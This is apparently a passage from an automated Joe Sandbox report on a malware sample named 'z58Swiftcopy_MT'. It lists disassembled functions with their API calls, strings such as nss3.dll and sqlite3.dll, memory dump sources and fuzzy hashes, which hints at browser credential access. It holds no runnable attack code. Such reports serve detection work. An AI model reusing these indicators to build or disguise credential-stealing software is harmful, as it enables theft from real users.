                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                                      • String ID: menu_%d
                                                                                                                                                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                                                                      Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _msizerealloc
                                                                                                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                                                                      Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                                      • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                                      • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                                                                                                      • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                                                                                                      Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                                      • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                                                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                                                                      Function 004073CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                                      • String ID: MZ@
                                                                                                                                                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                      • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                                                                                                      • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                                                                                                                                                      Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                                      • String ID: A4@$Server Details
                                                                                                                                                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                                                                                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                                                                      Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                                                                      Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,7693E430,?,00000000), ref: 0040858F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,7693E430,?,00000000), ref: 004085BA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3110682361-0
                                                                                                                                                                                                                                      • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                                                      Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                                                      Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                                      • Opcode ID: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                                                                                                                                                                      • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                                                                      Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`-v,00407A43,00000001,?,00000000,`-v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                                      • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59